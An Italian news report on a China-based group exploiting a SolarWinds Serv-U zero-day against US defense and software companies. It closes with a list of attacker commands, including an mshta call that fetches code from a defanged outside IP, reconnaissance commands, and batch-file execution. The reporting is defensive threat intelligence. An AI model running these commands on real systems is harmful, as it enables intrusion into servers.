Hacker sfruttano il bug zero-day di SolarWinds per attacchi contro gli Stati Uniti

Hacker cinesi stanno prendono di mira  le società di difesa e software statunitensi utilizzando una vulnerabilità nel server FTP SolarWinds Serv-U.

“Il gruppo ha sede in Cina ed è utilizza VPN commerciali e router consumer compromessi nella propria infrastruttura di attacco”, conferma un nuovo post sul blog del Microsoft Threat Intelligence Center.

“Il settore DIB è il complesso industriale mondiale che consente ricerca e sviluppo (R&S), nonché progettazione, produzione, consegna e manutenzione di sistemi d’arma militari, sottosistemi e componenti o parti, per soddisfare i requisiti militari statunitensi”, spiega un Documento CISA descrittivo del settore DIB.

Di seguito sono elencati alcuni dei comandi eseguiti tramite la vulnerabilità legata all’esecuzione di codice in remoto.

C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)

cmd.exe /c whoami > “./Client/Common/redacted.txt”

cmd.exe /c dir > “.\Client\Common\redacted.txt”

cmd.exe /c “”C:\Windows\Temp\Serv-U.bat””

powershell.exe C:\Windows\Temp\Serv-U.bat

cmd.exe /c type \\redacted\redacted.Archive > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive”